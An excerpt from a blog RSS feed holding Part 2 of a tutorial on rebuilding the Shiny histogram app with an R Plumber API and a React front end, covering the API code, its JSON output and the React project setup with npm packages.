&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
https://{YOUR_CONNECT_SERVER_HERE}/stf/react/
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="final-words"&gt;Final Words&lt;/h3&gt;
&lt;p&gt;You should be finished if everything is operating as planned, which means you&amp;rsquo;ll have your app deployed on RStudio Connect. If you&amp;rsquo;ve made it this far, congratulations! It was a lengthy tutorial!&lt;/p&gt;
&lt;p&gt;Thanks for following along, we hope you&amp;rsquo;ve found it helpful and that you&amp;rsquo;re now intrigued by the possibility of React apps on RStudio Connect.&lt;/p&gt;
&lt;p&gt;If you have any questions or feedback, please let us know.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 2</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/</link><pubDate>Thu, 14 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: Recreating the Shiny App tutorial with a Plumber API + React: Part 2 (this post)&lt;/li&gt;
&lt;li&gt;Part 3: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 3&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the first part of this series, we introduced the technologies and packages required to create an application using ReactJS and an R {plumber} API instead of {shiny}. In this post, we will take you through the tutorial itself.&lt;/p&gt;
&lt;h3 id="dependencies"&gt;Dependencies&lt;/h3&gt;
&lt;p&gt;Before we start we need to ensure we have the tools that this exercise depends on:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://nodejs.org/en/" rel="external"&gt;Node &amp;gt;= 10.16 and npm &amp;gt;= 5.6&lt;/a&gt; - Node is a JavaScript runtime environment that allows us to run JavaScript outside of a Web browser, npm is software registry that runs on Node.js that we can use to download open source packages.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.r-project.org/" rel="external"&gt;R&lt;/a&gt; - If you&amp;rsquo;re on this blog you&amp;rsquo;re probably familiar with R&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rplumber.io/" rel="external"&gt;R Plumber&lt;/a&gt; - The web API R Package&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.rstudio.com/products/connect/" rel="external"&gt;RStudio Connect&lt;/a&gt; - The publishing platform we want to host our content on&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/rsconnect/" rel="external"&gt;rsconnect R package&lt;/a&gt; - An R package used for deploying applications to RStudio Connect.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For the IDE I am using Visual Studio Code (VSCode), although which IDE you use is up to you. VScode is a popular code editor that offers many features to help developers be more productive. VScode has a wide range of extensions that can add even more functionality, such as support for various languages and tools to help with version control. I think it is a great choice of IDE for this tutorial as we&amp;rsquo;re making use of multiple languages.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-node-npm-part-2"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="lets-make-the-app"&gt;Let&amp;rsquo;s make the App&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ll assume you have a basic understanding of HTML and JavaScript, but you should be able to follow along with a basic programming background. Having a little knowledge of Linux shell commands would be beneficial for some of the terminal commands for generating directories, but you can also do most of it in VSCode using the user interface instead.&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s attempt an exercise in creating a small React+Plumber app; this will be very similar to a previous &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-python-flask/" rel="external"&gt;blog post&lt;/a&gt; recreating &lt;a href="https://shiny.rstudio.com/tutorial/written-tutorial/lesson1/" rel="external"&gt;this tutorial {shiny} application&lt;/a&gt; using Python Flask.&lt;/p&gt;
&lt;img class="image-center" src="HelloReact.png" alt="Screenshot of histogram of waiting times with bins slider." style="width:650px; class:image-center"&gt;
&lt;p&gt;This will consist of two independent parts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The R Plumber API that will serve the data&lt;/li&gt;
&lt;li&gt;The React UI that will consume the data from the API&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="folder-structure"&gt;Folder Structure&lt;/h3&gt;
&lt;p&gt;Let&amp;rsquo;s start by creating a directory containing the project and then also a directory to house the API we will create.
The below is a bash script but use whichever way is easiest for you to create directories.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkdir -p app_example/api
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After this command the folder structure should look like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
└── api
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We would like our folder structure to eventually look like this:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
├── api
└── example-app
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;But we will create the app directory later using a React command line tool.&lt;/p&gt;
&lt;h3 id="plumberr-api"&gt;Plumber.R (API)&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
└── api
   └── plumber.R
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Here is the code for the plumber.R file for our React app. It will contain a single endpoint who&amp;rsquo;s sole purpose is to return some histogram data that can be consumed by the React application.&lt;/p&gt;
&lt;p&gt;We can create a new file under the API directory and add the following.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# plumber.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#*@apiTitle Example Plumber API&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* Get Histogram raw data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /hist-raw&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(bins) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; faithful&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;waiting
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.numeric&lt;/span&gt;(bins)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breaks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;seq&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;min&lt;/span&gt;(x), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;max&lt;/span&gt;(x), length.out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; bins &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hist_out &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;hist&lt;/span&gt;(x, breaks &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; breaks, main &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Raw Histogram&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;as.data.frame&lt;/span&gt;(hist_out[2&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that at the top we have changed the title of our API with the &amp;ldquo;&lt;code&gt;#*@apiTitle&lt;/code&gt;&amp;rdquo; prefix and we have named it &amp;ldquo;Example Plumber API&amp;rdquo;&lt;/p&gt;
&lt;p&gt;This uses the &amp;ldquo;Old Faithful Geyser Data&amp;rdquo; dataset which is natively available within R. We then pass this data into a histogram function along with a user specified number of bins parameter, and transform this into a dataframe of raw information that describes a histogram that looks something like the following:&lt;/p&gt;
&lt;h3 id="histogram-function-output"&gt;Histogram Function Output&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; counts density mids xname equidist
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01526082&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;48.3&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01734184&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;58.9&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;32&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01109878&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;69.5&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;117&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.04057991&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;80.1&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.01005827&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;90.7&lt;/span&gt; x &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="runplumberr-api"&gt;runPlumber.R (API)&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;.
└── app_example
└── api
├── runPlumber.R
   └── plumber.R
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Our runPlumber.R file is dependent on the Plumber.R file above&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plumber&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;plumber.R&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_run&lt;/span&gt;(port &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;8000&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here is our second R file. It passes our previous plumber.R file in a {plumber} router function and runs it on a port of our choice. In this example we have gone with port 8000.&lt;/p&gt;
&lt;p&gt;We can check if the {plumber} API works by running our runPlumber.R with RScript from a terminal&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;RScript runPlumber.R
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If you&amp;rsquo;re attempting this on Windows you may need to specify the full path to the RScript executable in the R directory in Program Files which might look something like the following&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;C:\Program Files\R\(R Version)\bin\x64\RScript.exe&amp;#34;&lt;/span&gt; runPlumber.R
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This should get the following output:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Running plumber API at http://127.0.0.1:8000
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Running swagger Docs at http://127.0.0.1:8000/__docs__/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can then view the documentation of our {plumber} app which has been created through swagger
at the address given when viewed from a browser&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;http://127.0.0.1:8000/__docs__/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We can select the endpoint we want to check, click &amp;ldquo;Try it out&amp;rdquo;, then enter a number of bins and execute.&lt;/p&gt;
&lt;img class="image-center" src="APIBrowser2.png" alt="Screenshot of input screen requesting number of bins" style="width:650px; class:image-center"&gt;
&lt;p&gt;If we enter 5 as the number of bins we should get a response similar to the Output below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-json" data-lang="json"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;44&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0153&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;48.3&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;50&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0173&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;58.9&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;32&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0111&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;69.5&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;117&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0406&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;80.1&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; },
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;29&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;density&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;0.0101&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;90.7&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;xname&amp;#34;&lt;/span&gt;: &lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#7ee787"&gt;&amp;#34;equidist&amp;#34;&lt;/span&gt;: &lt;span style="color:#79c0ff"&gt;true&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If this works for you then the {plumber} API example is completed for now. We just need to make the React Application that consumes this API data.&lt;/p&gt;
&lt;h2 id="react-application"&gt;React Application&lt;/h2&gt;
&lt;p&gt;We want to change directory to the parent app_example directory and create a React application here.
Using create-react-app is the best to way to start creating a single page react application&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npx create-react-app example-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cd example-app
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm start
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;npx is an npm command allowing us to run a package without downloading it, so we can run the create-react-app package without storing the node module.&lt;/p&gt;
&lt;p&gt;This generates a react application directory within the directory we are in, with the name that we give to the create-react-app command; in this case it is example-app, but you may call it whatever you wish.
We can then change directory into the created example-app directory and use npm start to start a development server hosting the example app.&lt;/p&gt;
&lt;p&gt;A development server updates while runnning when it detects changes in the source code detected in the src subdirectory.
We can now view the example app if we navigate to &lt;code&gt;localhost:3000&lt;/code&gt; in a web browser.&lt;/p&gt;
&lt;img class="image-center" src="react_base_page.png" alt="Screenshot of react logo with text: Edit src/App.js and save to reload. Learn React." style="width:650px; class:image-center"&gt;
&lt;p&gt;We can stop the development server for now using Ctrl+C in the terminal hosting the app.&lt;/p&gt;
&lt;h3 id="npm-dependencies"&gt;npm dependencies&lt;/h3&gt;
&lt;p&gt;We now need to install some npm dependencies using npm from within our example-app directory&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm install react-bootstrap bootstrap react-plotly.js plotly.js rc-slider axios lodash
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will install packages containing some open source React components that we will use in our application&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://react-bootstrap.github.io/" rel="external"&gt;react-bootstrap&lt;/a&gt; - a React package for Bootstrap&lt;/li&gt;
&lt;li&gt;&lt;a href="https://getbootstrap.com/" rel="external"&gt;bootstrap&lt;/a&gt; - a styling library for quickly designing UIs&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/javascript/react/" rel="external"&gt;react-plotly.js&lt;/a&gt; - a React wrapper for plotly.js&lt;/li&gt;
&lt;li&gt;&lt;a href="https://plotly.com/javascript/react/" rel="external"&gt;plotly.js&lt;/a&gt; - a dependency for react-plotly.js a graphing library which we will use to consume our histogram data&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.npmjs.com/package/rc-slider" rel="external"&gt;rc-slider&lt;/a&gt; - a React slider component which we will use to select the number of bins&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/axios/axios" rel="external"&gt;axios&lt;/a&gt; - a Promise based HTTP client which we will use to make requests to our API&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lodash.com/" rel="external"&gt;lodash&lt;/a&gt; - a performance and utility library which we will use to &lt;a href="https://css-tricks.com/debouncing-throttling-explained-examples/" rel="external"&gt;debounce&lt;/a&gt; requests from the rc slider&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="jsx"&gt;JSX&lt;/h3&gt;
&lt;p&gt;The JavaScript files in the following sections will contain JSX which is a syntax extension for JavaScript which you may not be familiar with if you have only had experience with base JavaScript. JSX converts into base JavaScript when compiled, the two below snippets are identical in functionality.&lt;/p&gt;
